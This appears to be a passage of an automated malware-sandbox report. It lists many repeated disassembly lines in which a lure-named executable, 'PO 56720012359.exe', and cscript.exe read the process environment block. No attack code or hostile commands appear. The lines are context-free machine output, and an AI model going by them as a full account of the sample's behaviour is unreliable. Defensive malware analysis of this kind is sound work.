          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139B260 mov eax, dword ptr fs:[00000030h]3_2_0139B260
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8A62 mov eax, dword ptr fs:[00000030h]3_2_013B8A62
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01374257 mov eax, dword ptr fs:[00000030h]3_2_01374257
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9240 mov eax, dword ptr fs:[00000030h]3_2_012E9240
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9240 mov eax, dword ptr fs:[00000030h]3_2_012E9240
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9240 mov eax, dword ptr fs:[00000030h]3_2_012E9240
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9240 mov eax, dword ptr fs:[00000030h]3_2_012E9240
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AEA55 mov eax, dword ptr fs:[00000030h]3_2_013AEA55
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131FAB0 mov eax, dword ptr fs:[00000030h]3_2_0131FAB0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E52A5 mov eax, dword ptr fs:[00000030h]3_2_012E52A5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E52A5 mov eax, dword ptr fs:[00000030h]3_2_012E52A5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E52A5 mov eax, dword ptr fs:[00000030h]3_2_012E52A5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E52A5 mov eax, dword ptr fs:[00000030h]3_2_012E52A5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E52A5 mov eax, dword ptr fs:[00000030h]3_2_012E52A5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FAAB0 mov eax, dword ptr fs:[00000030h]3_2_012FAAB0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FAAB0 mov eax, dword ptr fs:[00000030h]3_2_012FAAB0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131D294 mov eax, dword ptr fs:[00000030h]3_2_0131D294
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131D294 mov eax, dword ptr fs:[00000030h]3_2_0131D294
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312AE4 mov eax, dword ptr fs:[00000030h]3_2_01312AE4
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312ACB mov eax, dword ptr fs:[00000030h]3_2_01312ACB
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0136A537 mov eax, dword ptr fs:[00000030h]3_2_0136A537
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AE539 mov eax, dword ptr fs:[00000030h]3_2_013AE539
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314D3B mov eax, dword ptr fs:[00000030h]3_2_01314D3B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314D3B mov eax, dword ptr fs:[00000030h]3_2_01314D3B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314D3B mov eax, dword ptr fs:[00000030h]3_2_01314D3B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8D34 mov eax, dword ptr fs:[00000030h]3_2_013B8D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F3D34 mov eax, dword ptr fs:[00000030h]3_2_012F3D34
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EAD30 mov eax, dword ptr fs:[00000030h]3_2_012EAD30
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130C577 mov eax, dword ptr fs:[00000030h]3_2_0130C577
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130C577 mov eax, dword ptr fs:[00000030h]3_2_0130C577
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01307D50 mov eax, dword ptr fs:[00000030h]3_2_01307D50
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01323D43 mov eax, dword ptr fs:[00000030h]3_2_01323D43
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01363540 mov eax, dword ptr fs:[00000030h]3_2_01363540
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01311DB5 mov eax, dword ptr fs:[00000030h]3_2_01311DB5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01311DB5 mov eax, dword ptr fs:[00000030h]3_2_01311DB5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01311DB5 mov eax, dword ptr fs:[00000030h]3_2_01311DB5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013135A1 mov eax, dword ptr fs:[00000030h]3_2_013135A1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B05AC mov eax, dword ptr fs:[00000030h]3_2_013B05AC
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B05AC mov eax, dword ptr fs:[00000030h]3_2_013B05AC
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E2D8A mov eax, dword ptr fs:[00000030h]3_2_012E2D8A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E2D8A mov eax, dword ptr fs:[00000030h]3_2_012E2D8A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E2D8A mov eax, dword ptr fs:[00000030h]3_2_012E2D8A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E2D8A mov eax, dword ptr fs:[00000030h]3_2_012E2D8A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E2D8A mov eax, dword ptr fs:[00000030h]3_2_012E2D8A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131FD9B mov eax, dword ptr fs:[00000030h]3_2_0131FD9B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131FD9B mov eax, dword ptr fs:[00000030h]3_2_0131FD9B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312581 mov eax, dword ptr fs:[00000030h]3_2_01312581
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312581 mov eax, dword ptr fs:[00000030h]3_2_01312581
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312581 mov eax, dword ptr fs:[00000030h]3_2_01312581
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312581 mov eax, dword ptr fs:[00000030h]3_2_01312581
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01398DF1 mov eax, dword ptr fs:[00000030h]3_2_01398DF1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FD5E0 mov eax, dword ptr fs:[00000030h]3_2_012FD5E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FD5E0 mov eax, dword ptr fs:[00000030h]3_2_012FD5E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AFDE2 mov eax, dword ptr fs:[00000030h]3_2_013AFDE2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov ecx, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366DC9 mov eax, dword ptr fs:[00000030h]3_2_01366DC9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131BC2C mov eax, dword ptr fs:[00000030h]3_2_0131BC2C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B740D mov eax, dword ptr fs:[00000030h]3_2_013B740D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1C06 mov eax, dword ptr fs:[00000030h]3_2_013A1C06
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366C0A mov eax, dword ptr fs:[00000030h]3_2_01366C0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130746D mov eax, dword ptr fs:[00000030h]3_2_0130746D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137C450 mov eax, dword ptr fs:[00000030h]3_2_0137C450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137C450 mov eax, dword ptr fs:[00000030h]3_2_0137C450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A44B mov eax, dword ptr fs:[00000030h]3_2_0131A44B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F849B mov eax, dword ptr fs:[00000030h]3_2_012F849B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A14FB mov eax, dword ptr fs:[00000030h]3_2_013A14FB
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01366CF0 mov eax, dword ptr fs:[00000030h]3_2_01366CF0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8CD6 mov eax, dword ptr fs:[00000030h]3_2_013B8CD6
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E4F2E mov eax, dword ptr fs:[00000030h]3_2_012E4F2E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E4F2E mov eax, dword ptr fs:[00000030h]3_2_012E4F2E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131E730 mov eax, dword ptr fs:[00000030h]3_2_0131E730
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130F716 mov eax, dword ptr fs:[00000030h]3_2_0130F716
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FF10 mov eax, dword ptr fs:[00000030h]3_2_0137FF10
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FF10 mov eax, dword ptr fs:[00000030h]3_2_0137FF10
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B070D mov eax, dword ptr fs:[00000030h]3_2_013B070D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B070D mov eax, dword ptr fs:[00000030h]3_2_013B070D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A70E mov eax, dword ptr fs:[00000030h]3_2_0131A70E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A70E mov eax, dword ptr fs:[00000030h]3_2_0131A70E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FFF60 mov eax, dword ptr fs:[00000030h]3_2_012FFF60
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8F6A mov eax, dword ptr fs:[00000030h]3_2_013B8F6A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FEF40 mov eax, dword ptr fs:[00000030h]3_2_012FEF40
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F8794 mov eax, dword ptr fs:[00000030h]3_2_012F8794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013237F5 mov eax, dword ptr fs:[00000030h]3_2_013237F5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139FE3F mov eax, dword ptr fs:[00000030h]3_2_0139FE3F
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EE620 mov eax, dword ptr fs:[00000030h]3_2_012EE620
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A61C mov eax, dword ptr fs:[00000030h]3_2_0131A61C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A61C mov eax, dword ptr fs:[00000030h]3_2_0131A61C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01318E00 mov eax, dword ptr fs:[00000030h]3_2_01318E00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1608 mov eax, dword ptr fs:[00000030h]3_2_013A1608
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F766D mov eax, dword ptr fs:[00000030h]3_2_012F766D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AAE44 mov eax, dword ptr fs:[00000030h]3_2_013AAE44
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AAE44 mov eax, dword ptr fs:[00000030h]3_2_013AAE44
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013646A7 mov eax, dword ptr fs:[00000030h]3_2_013646A7
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FE87 mov eax, dword ptr fs:[00000030h]3_2_0137FE87
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F76E2 mov eax, dword ptr fs:[00000030h]3_2_012F76E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013116E0 mov ecx, dword ptr fs:[00000030h]3_2_013116E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8ED6 mov eax, dword ptr fs:[00000030h]3_2_013B8ED6
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01328EC7 mov eax, dword ptr fs:[00000030h]3_2_01328EC7
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139FEC0 mov eax, dword ptr fs:[00000030h]3_2_0139FEC0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013136CC mov eax, dword ptr fs:[00000030h]3_2_013136CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532AD30 mov eax, dword ptr fs:[00000030h]16_2_0532AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EE539 mov eax, dword ptr fs:[00000030h]16_2_053EE539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8D34 mov eax, dword ptr fs:[00000030h]16_2_053F8D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053AA537 mov eax, dword ptr fs:[00000030h]16_2_053AA537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534C577 mov eax, dword ptr fs:[00000030h]16_2_0534C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534C577 mov eax, dword ptr fs:[00000030h]16_2_0534C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05347D50 mov eax, dword ptr fs:[00000030h]16_2_05347D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05363D43 mov eax, dword ptr fs:[00000030h]16_2_05363D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A3540 mov eax, dword ptr fs:[00000030h]16_2_053A3540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053D3D40 mov eax, dword ptr fs:[00000030h]16_2_053D3D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F05AC mov eax, dword ptr fs:[00000030h]16_2_053F05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F05AC mov eax, dword ptr fs:[00000030h]16_2_053F05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053535A1 mov eax, dword ptr fs:[00000030h]16_2_053535A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535FD9B mov eax, dword ptr fs:[00000030h]16_2_0535FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535FD9B mov eax, dword ptr fs:[00000030h]16_2_0535FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053D8DF1 mov eax, dword ptr fs:[00000030h]16_2_053D8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533D5E0 mov eax, dword ptr fs:[00000030h]16_2_0533D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533D5E0 mov eax, dword ptr fs:[00000030h]16_2_0533D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov ecx, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
